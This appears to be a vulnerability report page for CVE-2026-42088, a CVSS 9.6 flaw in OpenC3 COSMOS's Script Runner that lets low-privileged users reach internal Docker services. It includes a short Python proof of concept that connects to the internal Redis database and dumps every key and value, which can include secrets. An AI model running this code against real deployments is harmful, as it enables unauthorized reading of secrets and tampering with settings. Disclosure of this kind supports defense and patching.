Security Vulnerability Report
CVE-2026-42088 CVSS 9.6 CRITICAL

Published: 2026-05-04 18:16:31
Last Modified: 2026-05-13 20:47:47

Description

OpenC3 COSMOS provides the functionality needed to send commands to and receive data from one or more embedded systems. Prior to version 7.0.0-rc3, the Script Runner widget allows users to execute Python and Ruby scripts directly from the openc3-COSMOS-script-runner-api container. Because all the docker containers share a network, users can execute specially crafted scripts to bypass the API permissions check and perform administrative actions, including reading and modifying data inside the Redis database, which can be used to read secrets and change COSMOS settings, as well as read and write to the buckets service, which holds configuration, log, and plugin files. These actions are normally only available from the Admin Console or with administrative privileges. Any user with permission to create and run scripts can connect to any service in the docker network. This issue has been patched in version 7.0.0-rc3.

CVSS Details

CVSS Score
9.6
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:openc3:cosmos:*:*:*:*:open_source:*:*:* - VULNERABLE
cpe:2.3:a:openc3:cosmos:7.0.0:rc1:*:*:open_source:*:*:* - VULNERABLE
cpe:2.3:a:openc3:cosmos:7.0.0:rc2:*:*:open_source:*:*:* - VULNERABLE
OpenC3 COSMOS < 7.0.0-rc3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC: Accessing internal Redis from Script Runner container
import redis

# Connect to Redis using the internal Docker network hostname
# This bypasses the application-level API checks
r = redis.Redis(host='redis', port=6379, db=0)

print("[*] Attempting to dump Redis keys...")
try:
    # List all keys to find sensitive data (secrets, configs)
    keys = r.keys('*')
    for key in keys:
        key_type = r.type(key).decode('utf-8')
        print(f"Found Key: {key}, Type: {key_type}")
        # Extract value if it is a string
        if key_type == 'string':
            val = r.get(key).decode('utf-8')
            print(f"Value: {val}")
except Exception as e:
    print(f"Error: {e}")

# Example: Writing to the bucket service (if accessible via HTTP API)
# import requests
# print("[*] Attempting to access bucket service...")
# response = requests.get('http://openc3-buckets:3000/api/buckets')
# print(response.text)
```

References

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-42088", "sourceIdentifier": "[email protected]", "published": "2026-05-04T18:16:31.007", "lastModified": "2026-05-13T20:47:46.973", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenC3 COSMOS provides the functionality needed to send commands to and receive data from one or more embedded systems. Prior to version 7.0.0-rc3, the Script Runner widget allows users to execute Python and Ruby scripts directly from the openc3-COSMOS-script-runner-api container. Because all the docker containers share a network, users can execute specially crafted scripts to bypass the API permissions check and perform administrative actions, including reading and modifying data inside the Redis database, which can be used to read secrets and change COSMOS settings, as well as read and write to the buckets service, which holds configuration, log, and plugin files. These actions are normally only available from the Admin Console or with administrative privileges. Any user with permission to create and run scripts can connect to any service in the docker network. This issue has been patched in version 7.0.0-rc3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-250"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openc3:cosmos:*:*:*:*:open_source:*:*:*", "versionEndExcluding": "7.0.0", "matchCriteriaId": "286B983F-D46F-46E4-8EEA-FFA6506A005B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openc3:cosmos:7.0.0:rc1:*:*:open_source:*:*:*", "matchCriteriaId": "38B72355-49A3-4D2F-BFDB-EE53C9E2C7AD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openc3:cosmos:7.0.0:rc2:*:*:open_source:*:*:*", "matchCriteriaId": "13E3A0EA-1085-4505-80BB-C0B133EC3498"}]}]}], "references": [{"url": "https://github.com/OpenC3/cosmos/releases/tag/v7.0.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/OpenC3/cosmos/releases/tag/v7.0.0-rc3", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/OpenC3/cosmos/security/advisories/GHSA-2wvh-87g2-89hr", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/OpenC3/cosmos/security/advisories/GHSA-2wvh-87g2-89hr", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
```